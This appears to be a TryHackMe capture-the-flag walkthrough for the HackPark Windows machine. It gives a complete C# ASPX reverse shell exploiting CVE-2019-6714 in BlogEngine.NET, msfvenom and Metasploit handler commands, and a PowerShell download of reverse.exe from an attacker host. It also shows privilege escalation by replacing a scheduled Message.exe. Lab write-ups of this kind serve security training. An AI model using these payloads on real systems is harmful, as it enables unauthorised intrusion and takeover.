HackPark | TryHackMe Walkthrough
About Machine
HackPark is the medium room on TryHackMe. In the initial stage, a login page vulnerable to CVE-2019–6714 is discovered, providing us with RCE. Once inside the machine and following enumeration using winPEAS, poor service permissions are found for SystemScheduler. Unusual files exist within SystemScheduler, including a logfile. Upon reading the log file, information is obtained indicating that a message.exe file runs every 30 seconds. Therefore, replacing the original message.exe file with our vulnerable message.exe grants us a reverse shell for the Administration user.
Enumeration
nmap -Pn -sC -sV -sS -p- 10.10.101.115
Port 80 (http) and port 3389 (RDP) were found to be open. Enumeration of port 80 was initiated to discover valuable information.
http://10.10.101.115/Account/login.aspx?ReturnURL=/admin/
When port 80 was visited, a web page was found to be hosted. On the right side of the web page, a menu bar was observed. While navigating to the menu bar, a login menu was discovered, which redirected to a login page.
Many default login credentials were attempted, but they did not work. I started to brute force the login using Burp Suite.
The login request was captured using Burp Suite, and the request was sent to Intruder. The “Sniper” attack type was selected, focusing on the password field for the attack.
After initiating the attack, I filtered the results based on their length and identified a single result with a different length. Upon inspecting the responses, it was observed that this particular result was redirecting to “/admin/.” Therefore, I used the identified credentials to attempt a login.
Username: admin
Password: 1qaz2wsx
I successfully logged in with the obtained credentials, and a dashboard appeared after the login.
While navigating to the “About” options, I found the version of the site, which was using BlogEngine version 3.3.6.0. I began searching for vulnerabilities related to that specific version.
BlogEngine.NET version 3.3.6 was found to be vulnerable to a Path traversal vulnerability that could potentially lead to remote code execution. This vulnerability is known to affect BlogEngine.NET versions 3.3.6 and earlier. The issue is attributed to an unchecked “theme” parameter that can be manipulated to override the default theme used for rendering blog pages, potentially allowing malicious code execution.
CVE-2019–6714 has been assigned to this specific vulnerability in BlogEngine.NET version 3.3.6, documenting and tracking it as a known security issue.
<script runat="server">
static System.IO.StreamWriter streamWriter;
protected override void OnLoad(EventArgs e) {
base.OnLoad(e);
using(System.Net.Sockets.TcpClient client = new System.Net.Sockets.TcpClient("<IP>", 4445)) {
using(System.IO.Stream stream = client.GetStream()) {
using(System.IO.StreamReader rdr = new System.IO.StreamReader(stream)) {
streamWriter = new System.IO.StreamWriter(stream);
StringBuilder strInput = new StringBuilder();
System.Diagnostics.Process p = new System.Diagnostics.Process();
p.StartInfo.FileName = "cmd.exe";
p.StartInfo.CreateNoWindow = true;
p.StartInfo.UseShellExecute = false;
p.StartInfo.RedirectStandardOutput = true;
p.StartInfo.RedirectStandardInput = true;
p.StartInfo.RedirectStandardError = true;
p.OutputDataReceived += new System.Diagnostics.DataReceivedEventHandler(CmdOutputDataHandler);
p.Start();
p.BeginOutputReadLine();
while(true) {
strInput.Append(rdr.ReadLine());
p.StandardInput.WriteLine(strInput);
strInput.Remove(0, strInput.Length);
}
}
}
}
}
private static void CmdOutputDataHandler(object sendingProcess, System.Diagnostics.DataReceivedEventArgs outLine) {
StringBuilder strOutput = new StringBuilder();
if (!String.IsNullOrEmpty(outLine.Data)) {
try {
strOutput.Append(outLine.Data);
streamWriter.WriteLine(strOutput);
streamWriter.Flush();
} catch (Exception err) { }
}
}
</script>
After studying CVE-2019–6714, it was utilized to execute a reverse shell on the target system. This allowed to gain remote access and control over the system.
A reverse shell was successfully obtained.
Netcat session is a little unstable, so another reverse shell was generated using msfvenom to obtain Meterprete shell.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.17.58.44 LPORT=1234 -e x86/shikata_ga_nai -f exe -o reverse.exe
Generating a payload for reverse shell using msfvenom.
msfconsole -q
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <our local ip>
set LPORT <Listner_port>
run
Listner was started using msfconsole.
python3 -m http.server 80
Starting a python server, where reverse shell was generated to transfer in the machine.
cd C:\Windows\Temp
powershell -c wget "http://<IP_of_VPN/IP>/reverse.exe" -outfile "reverse.exe"
Navigate to the temp directory of the machine and download the reverse shell file from the attacker machine.
reverse.exe
Executing the reverse shell file by entering the name of the file.
Executing the reverse shell payload to obtain meterpreter shell.
sysinfo
Executing the Meterpreter sysinfo command to check the architecture of the target host.
upload <path of winPeas>
Uploading the WinPEAS enumeration executable using the Meterpreter upload command.
shell
winPEASx64.exe
Dropping into a normal CMD shell and executing WinPEAS.
AutoLogon credentials were found, which can be used to login for RDP. (port 3389 is RDP port)
Identified a service with poor service file permissions in place (SystemScheduler), this could be used to escalate privileges.
cd C:\Program Files (x86)\SystemScheduler
Navigating to the installation directory of SystemScheduler.
cd Events
Navigating to the Events folder, which looks unusual.
type 20198415519.INI_LOG.txt
Based on the log file, it looks like Message.exe runs every 30 seconds.
Navigate to the Systemsheduler folder to find the Message.exe file.
Privilege Escalation
The next step is to generate some shellcodes using MSFvenom.
msfvenom -p windows/shell_reverse_tcp --encoder x86/shikata_ga_nai LHOST=<VPN_IP/IP> LPORT=4444 -f exe > Message.exe
mv Message.exe message1.exe
upload <path of vulnerable Message.exe file>
Renaming Message.exe and replacing it with the malicious Message.exe previously created.
Once the system runs the Message.exe file, a callback is received as the Administrator user.
cd C:\Users\jeff\Desktop
When the privilege was granted, the file of the user Jeff could be read, and the user flag was able to be accessed.
cd c:\Users\Administrator\Desktop
Navigating to the administration desktop gives root flag.
